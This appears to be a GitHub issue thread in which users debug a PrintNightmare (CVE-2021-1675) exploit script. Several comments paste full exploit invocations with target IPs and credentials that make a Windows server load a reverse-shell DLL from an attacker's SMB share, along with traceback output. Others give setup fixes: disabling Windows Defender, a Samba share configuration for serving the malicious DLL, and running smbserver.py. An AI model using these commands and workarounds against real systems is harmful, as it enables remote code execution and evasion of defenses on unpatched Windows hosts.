Open braieralves opened 3 years ago
rewks
commented
3 years ago Did you copy the smb.conf in the README exactly? i.e. did you include this line:
force user = smbuser
If so, remove that line or change smbuser to a valid username on your attacking machine.
braieralves
commented
3 years ago Thanks for your help, @rewks .
I tried all combinations of users:
Nothing works.
If I remove the line, another error appears: "impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified."
braieralves
commented
3 years ago Same error in any machine test =/
korang
commented
3 years ago Try force user = nobody
braieralves
commented
3 years ago Hello, @korang .
Thanks. But if i do any changes in "force user =", this new error appears: "impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified."
I don't have any more ideas of what can be =(
braieralves
commented
3 years ago When i disable "Window defender", the script works =)
Thanks
wtechsec
commented
3 years ago impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist.
@cube0x0
@braieralves you disabled "windows defend" on the server, was that it?
I have this same error!
I tried the options but with no success!
Any idea?
braieralves
commented
3 years ago Hello @wtechsec .
Disable Windows Defender: https://jv16powertools.com/how-to-disable-windows-defender-windows-10/
Then, i created an AD user called "smbuser"(as in the /etc/samba/smb.conf).
After this, the exploit worked
mrh3r000
commented
3 years ago Hey @braieralves ,
I am having the same problem as you. Could you help me?
┌──(root💀kali)-[~/CVE-2021-1675]
└─# python3 CVE-2021-1675.py se130034/Administrator:Admin@123@192.168.40.195 '\\192.168.40.155>\smb\rev.dll'
[*] Connecting to ncacn_np:192.168.40.195[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_64a5c2d136933c8f\Amd64\UNIDRV.DLL
[*] Executing \\192.168.40.155>\smb\rev.dll
[*] Try 1...
Traceback (most recent call last):
File "/root/CVE-2021-1675/CVE-2021-1675.py", line 176, in <module>
main(dce, pDriverPath, options.share)
File "/root/CVE-2021-1675/CVE-2021-1675.py", line 84, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x35 - ERROR_BAD_NETPATH - The network path was not found.Hey @mrh3r000
Review this item: \192.168.40.155>\smb\rev.dll - Correct form: \192.168.40.155\smb\rev.dll
mrh3r000
commented
3 years ago I did it again from where and got the same error as the picture T_T. Could you help me ?
braieralves
commented
3 years ago @mrh3r000 your "file.dll" was made correctly?
mrh3r000
commented
3 years ago @braieralves
Sure... :((
surfd4wg
commented
3 years ago Still having the problem....
┌──(root💀kali)-[/tmp/CVE-2021-1675]
└─# python3 CVE-2021-1675.py smbuser:smbuser@10.1.1.111 '\10.1.1.37\smb\reverse.dll'
[] Connecting to ncacn_np:10.1.1.111[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\UNIDRV.DLL
[] Executing \??\UNC\10.1.1.37\smb\reverse.dll
[*] Try 1...
Traceback (most recent call last):
File "/tmp/CVE-2021-1675/CVE-2021-1675.py", line 188, in
Rao005
commented
2 years ago Hey @braieralves , I am having the same problem as you. Could you help me?
┌──(root💀kali)-[~/CVE-2021-1675] └─# python3 CVE-2021-1675.py se130034/Administrator:Admin@123@192.168.40.195 '\\192.168.40.155>\smb\rev.dll' [*] Connecting to ncacn_np:192.168.40.195[\PIPE\spoolss] [+] Bind OK [+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_64a5c2d136933c8f\Amd64\UNIDRV.DLL [*] Executing \\192.168.40.155>\smb\rev.dll [*] Try 1... Traceback (most recent call last): File "/root/CVE-2021-1675/CVE-2021-1675.py", line 176, in <module> main(dce, pDriverPath, options.share) File "/root/CVE-2021-1675/CVE-2021-1675.py", line 84, in main resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx return dce.request(request) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request raise exception impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x35 - ERROR_BAD_NETPATH - The network path was not found.
hi @mrh3r000 did you run smbserver? if not get smbserver.py from github and run as follows smbserver.py smb /tmp ps tmp is path to your file
T1erno
commented
2 years ago Well, I had the same problem and I solved it, but I don't know if it can help you. When the PoC is executed, the victim machine tries to look for a shared resource through smb, before I tried with smbserver.py from impacket, but it didn't work, instead I activated the smb service with sudo systemctl start smb, which looks for the configuration file /etc/samba/smb.conf sharing my /tmp/share folder. I created the malicious dll in /tmp/share. My /etc/samba/smb.conf file looks like this:
[smb]
comment = Samba
path = /tmp/share
guest ok = yes
read only = yes
browsable = yes
force user = nobodyHello everyone. I'm sorry for delay in answers. Let me analyze your questions and see if I can help, ok?
I'll see in the next weekend, ok?
Regards.
Hello.
I always receive this message: _impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCHUSER - The specified account does not exist.
Has anyone had the same problem or know how I can solve it please?
Complete stdout:
"root@debianbraier:~/impacket/CVE-2021-1675# ./CVE-2021-1675.py dcbraier.teste/balves:Passwordblablbal@172.16.224.10 '\172.16.224.6\smb\fakeprinter.dll' [] Connecting to ncacn_np:172.16.224.10[\PIPE\spoolss] [+] Bind OK [+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL [] Executing \172.16.224.6\smb\fakeprinter.dll [*] Try 1... Traceback (most recent call last): File "./CVE-2021-1675.py", line 176, in
main(dce, pDriverPath, options.share)
File "./CVE-2021-1675.py", line 84, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.7/dist-packages/impacket-0.9.24.dev1+20210630.100536.73b9466c-py3.7.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.7/dist-packages/impacket-0.9.24.dev1+20210630.100536.73b9466c-py3.7.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist."
User exist in the AD: "balves"
Target: WS 2019
Thanks